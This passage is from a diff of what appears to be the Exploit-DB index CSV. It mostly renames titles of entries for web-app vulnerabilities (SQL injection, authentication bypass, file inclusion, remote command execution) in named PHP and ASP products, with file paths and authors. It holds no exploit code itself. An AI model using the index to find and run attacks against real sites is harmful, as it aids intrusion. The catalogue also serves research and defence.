Vulnerabilities",2008-11-06,G4N0K,php,webapps,0 +7017,platforms/php/webapps/7017.txt,"Pre ADS Portal 2.0 - Authentication Bypass / Cross-Site Scripting",2008-11-06,G4N0K,php,webapps,0 7018,platforms/php/webapps/7018.txt,"NICE FAQ Script - (Authentication Bypass) SQL Injection",2008-11-06,r45c4l,php,webapps,0 7019,platforms/php/webapps/7019.txt,"Arab Portal 2.1 (Windows) - Remote File Disclosure",2008-11-06,"Khashayar Fereidani",php,webapps,0 7020,platforms/php/webapps/7020.txt,"MySQL Quick Admin 1.5.5 - Local File Inclusion",2008-11-06,"Vinod Sharma",php,webapps,0 @@ -19864,7 +19874,7 @@ id,file,description,date,author,platform,type,port 7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,php,webapps,0 7062,platforms/php/webapps/7062.txt,"ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0 7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0 -7064,platforms/php/webapps/7064.pl,"Mambo Component 'com_n-forms' - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0 +7064,platforms/php/webapps/7064.pl,"Mambo Component n-form - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0 7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - 'theme' Parameter Local File Inclusion",2008-11-08,dun,php,webapps,0 7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass",2008-11-08,G4N0K,php,webapps,0 7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,asp,webapps,0 @@ -19941,7 +19951,7 @@ id,file,description,date,author,platform,type,port 7160,platforms/php/webapps/7160.php,"MyTopix 1.3.0 - (notes send) SQL Injection",2008-11-19,cOndemned,php,webapps,0 7162,platforms/php/webapps/7162.pl,"MauryCMS 0.53.2 - Arbitrary File Upload",2008-11-19,StAkeR,php,webapps,0 7163,platforms/php/webapps/7163.txt,"RevSense - (Authentication Bypass) SQL Injection",2008-11-19,d3b4g,php,webapps,0 -7164,platforms/php/webapps/7164.txt,"Pre Job Board - (Authentication Bypass) SQL Injection",2008-11-19,R3d-D3V!L,php,webapps,0 +7164,platforms/php/webapps/7164.txt,"Pre Job Board - Authentication Bypass",2008-11-19,R3d-D3V!L,php,webapps,0 7165,platforms/php/webapps/7165.pl,"wPortfolio 0.3 - Arbitrary File Upload",2008-11-19,Osirys,php,webapps,0 7166,platforms/php/webapps/7166.txt,"AskPert - (Authentication Bypass) SQL Injection",2008-11-19,TR-ShaRk,php,webapps,0 7168,platforms/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion",2008-11-20,StAkeR,php,webapps,0 @@ -20138,7 +20148,7 @@ id,file,description,date,author,platform,type,port 7407,platforms/php/webapps/7407.txt,"WebMaster Marketplace - 'member.php u' SQL Injection",2008-12-10,"Hussin X",php,webapps,0 7408,platforms/php/webapps/7408.txt,"living Local 1.1 - (Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0 7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0 -7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - (view.php id) SQL Injection",2008-12-10,Osirys,php,webapps,0 +7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection",2008-12-10,Osirys,php,webapps,0 7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0 7413,platforms/asp/webapps/7413.pl,"CF_Calendar - 'calendarevent.cfm' SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7414,platforms/asp/webapps/7414.txt,"CF_Auction - (forummessage) Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 @@ -20679,7 +20689,7 @@ id,file,description,date,author,platform,type,port 8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) SQL Injection",2009-03-17,g4t3w4y,php,webapps,0 8229,platforms/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",php,webapps,0 8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - 'url' Parameter Remote File Inclusion",2009-03-17,Garry,php,webapps,0 -8237,platforms/php/webapps/8237.txt,"facil-cms 0.1rc2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0 +8237,platforms/php/webapps/8237.txt,"Facil-CMS 0.1RC2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0 8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - 'gal' Parameter Blind SQL Injection",2009-03-18,boom3rang,php,webapps,0 8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 - Arbitrary File Deletion",2009-03-18,"Alfons Luja",php,webapps,0 8240,platforms/php/webapps/8240.txt,"DeluxeBB 1.3 - 'qorder' Parameter SQL Injection",2009-03-18,girex,php,webapps,0 @@ -20901,7 +20911,7 @@ id,file,description,date,author,platform,type,port 8664,platforms/php/webapps/8664.pl,"BigACE 2.5 - SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0 8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 - Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,php,webapps,0 -8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - (member) SQL Injection",2009-05-13,YEnH4ckEr,php,webapps,0 +8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - SQL Injection",2009-05-13,YEnH4ckEr,php,webapps,0 8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 - (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0 8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 - (Authentication Bypass / Cookie) SQL Injection",2009-05-13,Qabandi,php,webapps,0 8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 - Products Insecure Cookie Handling",2009-05-14,G4N0K,php,webapps,0 @@ -21477,7 +21487,7 @@ id,file,description,date,author,platform,type,port 9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0 9604,platforms/php/webapps/9604.txt,"Joomla! Component com_Joomlaoc - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0 9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0 -9609,platforms/php/webapps/9609.txt,"Mambo Component 'com_hestar' - SQL Injection",2009-09-09,M3NW5,php,webapps,0 +9609,platforms/php/webapps/9609.txt,"Mambo Component Hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0 9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0 9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - 'cacheId' Parameter Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusion",2009-09-10,Kurd-Team,php,webapps,0 @@ -21547,7 +21557,7 @@ id,file,description,date,author,platform,type,port 9826,platforms/php/webapps/9826.txt,"MindSculpt CMS - SQL Injection",2009-09-24,kaMitEz,php,webapps,0 9828,platforms/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection / Cross-Site Scripting",2009-09-23,"Alexey Sintsov",php,webapps,0 9830,platforms/php/webapps/9830.txt,"Cour Supreme - SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0 -9832,platforms/php/webapps/9832.txt,"Joomla! / Mambo Component 'com_tupinambis' - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0 +9832,platforms/php/webapps/9832.txt,"Joomla! / Mambo Component Tupinambis - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0 9833,platforms/php/webapps/9833.txt,"Joomla! Component com_facebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0 9834,platforms/asp/webapps/9834.txt,"BPLawyerCaseDocuments - SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 9835,platforms/php/webapps/9835.txt,"HB CMS 1.7 - SQL Injection",2009-09-22,"Securitylab Security Research",php,webapps,0 @@ -21651,7 +21661,7 @@ id,file,description,date,author,platform,type,port 10169,platforms/php/webapps/10169.txt,"phpMyBackupPro - Arbitrary File Download",2009-11-16,"Amol Naik",php,webapps,0 10170,platforms/multiple/webapps/10170.txt,"Xerver 4.31 / 4.32 - HTTP Response Splitting",2009-11-18,s4squatch,multiple,webapps,80 10177,platforms/php/webapps/10177.txt,"Joomla! Extension iF Portfolio Nexus - SQL Injection",2009-11-18,"599eme Man",php,webapps,0 -10178,platforms/php/webapps/10178.txt,"Joomla! / Mambo Component 'com_ezine' 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0 +10178,platforms/php/webapps/10178.txt,"Joomla! / Mambo Component D4J eZine 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0 10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Multiple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0 10181,platforms/php/webapps/10181.txt,"Bitrix Site Manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0 10183,platforms/php/webapps/10183.php,"Joomla! 1.5.12 TinyMCE - Remote Code Execution (via Arbitrary File Upload)",2009-11-19,daath,php,webapps,80 @@ -22002,7 +22012,7 @@ id,file,description,date,author,platform,type,port 10741,platforms/php/webapps/10741.txt,"Cybershade CMS 0.2 - Remote File Inclusion",2009-12-27,Mr.SeCreT,php,webapps,0 10742,platforms/php/webapps/10742.txt,"Joomla! Component com_dhforum - SQL Injection",2009-12-27,ViRuSMaN,php,webapps,0 10743,platforms/php/webapps/10743.txt,"phPay 2.2a - Backup",2009-12-26,indoushka,php,webapps,0 -10750,platforms/php/webapps/10750.txt,"Mambo Component 'com_materialsuche' 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0 +10750,platforms/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0 10751,platforms/php/webapps/10751.txt,"Dream4 Koobi Pro 6.1 Gallery - 'img_id' Parameter SQL Injection",2009-12-27,BILGE_KAGAN,php,webapps,0 10752,platforms/multiple/webapps/10752.txt,"Yonja - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80 10753,platforms/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80 @@ -22076,9 +22086,9 @@ id,file,description,date,author,platform,type,port 10861,platforms/php/webapps/10861.txt,"Discuz 1.03 - SQL Injection",2009-12-31,indoushka,php,webapps,0 10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - (lng) Local File Inclusion",2009-12-31,cOndemned,php,webapps,0 10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - (Authentication Bypass) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 -10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10873,platforms/php/webapps/10873.txt,"EasyGallery - 'catid' Parameter Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0 -10874,platforms/php/webapps/10874.txt,"Pre News Manager - (nid) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10874,platforms/php/webapps/10874.txt,"Pre News Manager - 'nid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10876,platforms/php/webapps/10876.txt,"PHP-MySQL-Quiz - SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10877,platforms/php/webapps/10877.txt,"PHP-AddressBook 3.1.5 - 'edit.php' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10878,platforms/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup",2009-12-31,indoushka,php,webapps,0 @@ -22360,7 +22370,7 @@ id,file,description,date,author,platform,type,port 11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0 11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps,0 11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,php,webapps,0 -11446,platforms/php/webapps/11446.txt,"Mambo Component 'com_akogallery' - SQL Injection",2010-02-14,snakespc,php,webapps,0 +11446,platforms/php/webapps/11446.txt,"Mambo Component AkoGallery - SQL Injection",2010-02-14,snakespc,php,webapps,0 11447,platforms/php/webapps/11447.txt,"Joomla! Component Jw_allVideos - Arbitrary File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0 11449,platforms/php/webapps/11449.txt,"Joomla! Component com_videos - SQL Injection",2010-02-14,snakespc,php,webapps,0 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Exploit",2010-02-14,ROOT_EGY,php,webapps,0 @@ -22523,7 +22533,7 @@ id,file,description,date,author,platform,type,port 11711,platforms/php/webapps/11711.txt,"Azeno CMS - SQL Injection",2010-03-13,"DevilZ TM",php,webapps,0 11715,platforms/php/webapps/11715.txt,"systemsoftware Community Black - 'index.php' SQL Injection",2010-03-13,"Easy Laster",php,webapps,0 11718,platforms/php/webapps/11718.txt,"Xbtit 2.0.0 - SQL Injection",2010-03-13,Ctacok,php,webapps,0 -11719,platforms/php/webapps/11719.txt,"Mambo Component 'com_mambads' - SQL Injection",2010-03-13,Dreadful,php,webapps,0 +11719,platforms/php/webapps/11719.txt,"Mambo Component MambAds - SQL Injection",2010-03-13,Dreadful,php,webapps,0 11721,platforms/php/webapps/11721.txt,"GeekHelps ADMP 1.01 - Multiple Vulnerabilities",2010-03-13,ITSecTeam,php,webapps,0 11722,platforms/php/webapps/11722.txt,"Ad Board Script 1.01 - Local File Inclusion",2010-03-13,ITSecTeam,php,webapps,0 11723,platforms/cgi/webapps/11723.pl,"Trouble Ticket Express 3.01 - Remote Code Execution / Directory Traversal",2010-03-14,zombiefx,cgi,webapps,0 @@ -22738,7 +22748,7 @@ id,file,description,date,author,platform,type,port 12057,platforms/php/webapps/12057.txt,"Joomla! Component 'com_press' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 12058,platforms/php/webapps/12058.txt,"Joomla! Component 'com_joomlapicasa' 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps,0 12060,platforms/php/webapps/12060.txt,"Joomla! Component 'com_serie' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 -12061,platforms/php/webapps/12061.txt,"Facil-CMS - (Local File Inclusion / Remote File Inclusion)",2010-04-04,eidelweiss,php,webapps,0 +12061,platforms/php/webapps/12061.txt,"Facil-CMS 0.1RC2 - Local / Remote File Inclusion",2010-04-04,eidelweiss,php,webapps,0 12062,platforms/php/webapps/12062.txt,"Joomla! Component 'com_ranking' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 12065,platforms/php/webapps/12065.txt,"Joomla! Component 'com_jinventory' - Local File Inclusion",2010-04-05,"Chip d3 bi0s",php,webapps,0 12066,platforms/php/webapps/12066.txt,"Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 @@ -22933,7 +22943,7 @@ id,file,description,date,author,platform,type,port 12369,platforms/php/webapps/12369.txt,"Madirish Webmail 2.01 - 'baseDir' Remote File Inclusion / Local File Inclusion",2010-04-24,eidelweiss,php,webapps,0 12370,platforms/php/webapps/12370.txt,"NCT Jobs Portal Script - Cross-Site Scripting / Authentication Bypass",2010-04-24,Sid3^effects,php,webapps,0 12371,platforms/php/webapps/12371.txt,"WHMCS control (WHMCompleteSolution) - SQL Injection",2010-04-24,"Islam DefenDers",php,webapps,0 -12372,platforms/php/webapps/12372.txt,"AskMe Pro 2.1 - (que_id) SQL Injection",2010-04-24,v3n0m,php,webapps,0 +12372,platforms/php/webapps/12372.txt,"Alstrasoft AskMe Pro 2.1 - 'que_id' Parameter SQL Injection",2010-04-24,v3n0m,php,webapps,0 12373,platforms/php/webapps/12373.txt,"Sethi Family Guestbook 3.1.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 12374,platforms/php/webapps/12374.txt,"G5 Scripts Guestbook PHP 1.2.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 12376,platforms/php/webapps/12376.php,"SmodCMS 4.07 (fckeditor) - Arbitrary File Upload",2010-04-24,eidelweiss,php,webapps,0 @@ -23361,7 +23371,7 @@ id,file,description,date,author,platform,type,port 13866,platforms/php/webapps/13866.txt,"Joke Website Script - SQL Injection / Cross-Site Scripting",2010-06-14,Valentin,php,webapps,0 13867,platforms/php/webapps/13867.txt,"E-Book Store - SQL Injection",2010-06-14,Valentin,php,webapps,0 13880,platforms/asp/webapps/13880.txt,"Smart ASP Survey - Cross-Site Scripting / SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 -13881,platforms/php/webapps/13881.txt,"Pre Job Board Pro - SQL Injection Authentication Bypass",2010-06-15,"L0rd CrusAd3r",php,webapps,0 +13881,platforms/php/webapps/13881.txt,"Pre Job Board Pro - Authentication Bypass",2010-06-15,"L0rd CrusAd3r",php,webapps,0 13882,platforms/asp/webapps/13882.txt,"SAS Hotel Management System - user_login.asp SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13883,platforms/asp/webapps/13883.txt,"Business Classified Listing - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13884,platforms/asp/webapps/13884.txt,"Restaurant Listing with Online Ordering - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 @@ -23797,7 +23807,7 @@ id,file,description,date,author,platform,type,port 14819,platforms/php/webapps/14819.html,"Pc4Uploader 9.0 - Cross-Site Request Forgery",2010-08-27,RENO,php,webapps,0 14820,platforms/php/webapps/14820.txt,"iGaming CMS - Multiple SQL Injections",2010-08-27,Sweet,php,webapps,0 14821,platforms/asp/webapps/14821.txt,"Shop Creator 4.0 - SQL Injection",2010-08-27,Pouya_Server,asp,webapps,0 -14822,platforms/php/webapps/14822.txt,"DiY-CMS 1.0 - Multiple Remote File Inclusion",2010-08-28,LoSt.HaCkEr,php,webapps,0 +14822,platforms/php/webapps/14822.txt,"DIY-CMS 1.0 - Multiple Remote File Inclusion",2010-08-28,LoSt.HaCkEr,php,webapps,0 14823,platforms/php/webapps/14823.txt,"textpattern CMS 4.2.0 - Remote File Inclusion",2010-08-28,Sn!pEr.S!Te,php,webapps,0 14826,platforms/php/webapps/14826.txt,"GaleriaSHQIP 1.0 - SQL Injection",2010-08-28,Valentin,php,webapps,0 14827,platforms/php/webapps/14827.py,"Blogman 0.7.1 - 'profile.php' SQL Injection",2010-08-28,"Ptrace Security",php,webapps,0 @@ -23859,10 +23869,9 @@ id,file,description,date,author,platform,type,port 14969,platforms/asp/webapps/14969.txt,"ASP Nuke - SQL Injection",2010-09-11,Abysssec,asp,webapps,0 14973,platforms/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,php,webapps,0 14977,platforms/php/webapps/14977.txt,"MyHobbySite 1.01 - SQL Injection / Authentication Bypass",2010-09-12,"YuGj VN",php,webapps,0 -14979,platforms/php/webapps/14979.txt,"Alstrasoft AskMe Pro 2.1 - (forum_answer.php?que_id) SQL Injection",2010-09-12,Amine_92,php,webapps,0 14980,platforms/asp/webapps/14980.txt,"eshtery CMS - SQL Injection",2010-09-12,Abysssec,asp,webapps,0 14985,platforms/php/webapps/14985.txt,"System Shop - (Module aktka) SQL Injection",2010-09-12,secret,php,webapps,0 -14986,platforms/php/webapps/14986.txt,"Alstrasoft AskMe Pro 2.1 - (profile.php?id) SQL Injection",2010-09-12,CoBRa_21,php,webapps,0 +14986,platforms/php/webapps/14986.txt,"Alstrasoft AskMe Pro 2.1 - 'profile.php' SQL Injection",2010-09-12,CoBRa_21,php,webapps,0 14988,platforms/php/webapps/14988.txt,"Group Office 3.5.9 - SQL Injection",2010-09-13,ViciOuS,php,webapps,0 14989,platforms/php/webapps/14989.txt,"osDate - 'uploadvideos.php' Arbitrary File Upload",2010-09-13,Xa7m3d,php,webapps,0 14991,platforms/asp/webapps/14991.txt,"Luftguitar CMS - Upload Arbitrary File",2010-09-13,Abysssec,asp,webapps,0 @@ -24098,7 +24107,7 @@ id,file,description,date,author,platform,type,port 15517,platforms/php/webapps/15517.txt,"Webmatic - 'index.php' SQL Injection",2010-11-13,v3n0m,php,webapps,0 15518,platforms/php/webapps/15518.txt,"Joomla! Component 'com_ccboard' 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0 15519,platforms/php/webapps/15519.txt,"OneOrZero AIms 2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,php,webapps,0 -15524,platforms/php/webapps/15524.txt,"Pre Ads Portal - SQL Bypass",2010-11-13,Cru3l.b0y,php,webapps,0 +15524,platforms/php/webapps/15524.txt,"Pre ADS Portal - Authentication Bypass",2010-11-13,Cru3l.b0y,php,webapps,0 15531,platforms/php/webapps/15531.txt,"BSI Advance Hotel Booking System 1.0 - SQL Injection",2010-11-14,v3n0m,php,webapps,0 15526,platforms/php/webapps/15526.txt,"Pre Online Tests Generator Pro - SQL Injection",2010-11-13,Cru3l.b0y,php,webapps,0 15550,platforms/php/webapps/15550.txt,"vBulletin 4.0.8 - Persistent Cross-Site Scripting via Profile Customization",2010-11-16,MaXe,php,webapps,0 @@ -24518,7 +24527,7 @@ id,file,description,date,author,platform,type,port 17035,platforms/php/webapps/17035.pl,"Constructr CMS 3.03 - Arbitrary File Upload",2011-03-23,plucky,php,webapps,0 17036,platforms/asp/webapps/17036.txt,"Web Wiz Forum - Injection",2011-03-23,eXeSoul,asp,webapps,0 17046,platforms/php/webapps/17046.txt,"SyndeoCMS 2.8.02 - Multiple Vulnerabilities (2)",2011-03-24,"High-Tech Bridge SA",php,webapps,0 -17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 - (POST) Persistent Cross-Site Scripting / XML Injection",2011-03-26,LiquidWorm,php,webapps,0 +17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 - Persistent Cross-Site Scripting / XML Injection",2011-03-26,LiquidWorm,php,webapps,0 17051,platforms/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 - Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps,0 17054,platforms/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",php,webapps,0 17055,platforms/php/webapps/17055.txt,"Honey Soft Web Solution - Multiple Vulnerabilities",2011-03-28,**RoAd_KiLlEr**,php,webapps,0 @@ -25035,10 +25044,10 @@ id,file,description,date,author,platform,type,port 18185,platforms/php/webapps/18185.txt,"Muster Render Farm Management System - Arbitrary File Download",2011-12-01,"Nick Freeman",php,webapps,0 18192,platforms/php/webapps/18192.txt,"Joomla! Component 'com_jobprofile' - SQL Injection",2011-12-02,kaMtiEz,php,webapps,0 18193,platforms/php/webapps/18193.txt,"WSN Classifieds 6.2.12 / 6.2.18 - Multiple Vulnerabilities",2011-12-02,d3v1l,php,webapps,0 -18198,platforms/php/webapps/18198.php,"Family Connections CMS 2.5.0 / 2.7.1 - (less.php) Remote Command Execution",2011-12-04,mr_me,php,webapps,0 +18198,platforms/php/webapps/18198.php,"Family Connections CMS 2.5.0 / 2.7.1 - 'less.php' Remote Command Execution",2011-12-04,mr_me,php,webapps,0 18202,platforms/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' - SQL Injection",2011-12-05,"Stefan Schurtz",php,webapps,0 18207,platforms/php/webapps/18207.txt,"Alstrasoft EPay Enterprise 4.0 - Blind SQL Injection",2011-12-06,Don,php,webapps,0 -18208,platforms/php/webapps/18208.rb,"Family Connections CMS - 'less.php' Remote Command Execution (Metasploit)",2011-12-07,Metasploit,php,webapps,0 +18208,platforms/php/webapps/18208.rb,"Family Connections CMS 2.7.1 - 'less.php' Remote Command Execution (Metasploit)",2011-12-07,Metasploit,php,webapps,0 18215,platforms/php/webapps/18215.txt,"SourceBans 1.4.8 - SQL Injection / Local File Inclusion Injection",2011-12-07,Havok,php,webapps,0 18217,platforms/php/webapps/18217.txt,"SantriaCMS - SQL Injection",2011-12-08,Troy,php,webapps,0 18218,platforms/php/webapps/18218.txt,"Joomla! Component 'com_qcontacts' 1.0.6 - SQL Injection",2011-12-08,Don,php,webapps,0 @@ -27943,7 +27952,6 @@ id,file,description,date,author,platform,type,port 26107,platforms/asp/webapps/26107.txt,"Dvbbs 7.1/8.2 - dispbbs.asp page Parameter Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0 26108,platforms/asp/webapps/26108.txt,"Dvbbs 7.1/8.2 - dispuser.asp name Parameter Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0 26109,platforms/asp/webapps/26109.txt,"Dvbbs 7.1/8.2 - boardhelp.asp Multiple Parameter Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0 -26110,platforms/php/webapps/26110.txt,"Gravity Board X 1.1 - DeleteThread.php Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 26111,platforms/php/webapps/26111.txt,"Gravity Board X 1.1 - CSS Template Unauthorized Access",2005-08-08,rgod,php,webapps,0 26112,platforms/php/webapps/26112.txt,"PHP Lite Calendar Express 2.2 - 'login.php' cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 26113,platforms/php/webapps/26113.txt,"PHP Lite Calendar Express 2.2 - auth.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 @@ -29101,7 +29109,7 @@ id,file,description,date,author,platform,type,port 27618,platforms/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 - Slideshow.php name Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 27619,platforms/php/webapps/27619.txt,"JetPhoto 1.0/2.0/2.1 - detail.php page Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 27620,platforms/cgi/webapps/27620.txt,"Microsoft FrontPage - Server Extensions Cross-Site Scripting",2006-04-11,"Esteban Martinez Fayo",cgi,webapps,0 -27621,platforms/php/webapps/27621.txt,"Clever Copy 3.0 - Connect.INC Information Disclosure",2006-04-11,"M.Hasran Addahroni",php,webapps,0 +27621,platforms/php/webapps/27621.txt,"Clever Copy 3.0 - 'Connect.INC' Information Disclosure",2006-04-11,"M.Hasran Addahroni",php,webapps,0 27622,platforms/php/webapps/27622.txt,"Dokeos 1.x - viewtopic.php SQL Injection",2006-04-11,"Alvaro Olavarria",php,webapps,0 27623,platforms/php/webapps/27623.txt,"SWSoft Confixx 3.1.2 - Jahr Parameter Cross-Site Scripting",2006-04-11,Snake_23,php,webapps,0 27624,platforms/php/webapps/27624.txt,"PHPKIT 1.6.1 R2 - Include.php SQL Injection",2006-04-11,"Hamid Ebadi",php,webapps,0 @@ -29284,8 +29292,7 @@ id,file,description,date,author,platform,type,port 27846,platforms/asp/webapps/27846.txt,"EImagePro - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 27848,platforms/php/webapps/27848.txt,"EImagePro - view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0 27849,platforms/asp/webapps/27849.txt,"EDirectoryPro - Search_result.asp SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 -27853,platforms/cfm/webapps/27853.txt,"Cartweaver 2.16.11 - Results.cfm category Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 -27854,platforms/cfm/webapps/27854.txt,"Cartweaver 2.16.11 - Details.cfm ProdID Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 +27853,platforms/cfm/webapps/27853.txt,"Cartweaver 2.16.11 - 'Results.cfm' SQL Injection",2006-04-25,r0t,cfm,webapps,0 27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter Cross-Site Scripting",2006-05-11,sn4k3.23,php,webapps,0 27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 - 'Vname' Parameter Cross-Site Scripting",2006-05-12,Kiki,php,webapps,0 27863,platforms/php/webapps/27863.txt,"phpBB 2.0.20 - Unauthorized HTTP Proxy",2006-05-12,rgod,php,webapps,0 @@ -29626,11 +29633,11 @@ id,file,description,date,author,platform,type,port 28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0 40378,platforms/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross-Site Scripting",2016-09-13,"Jakub A>>oczek",linux,webapps,0 28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 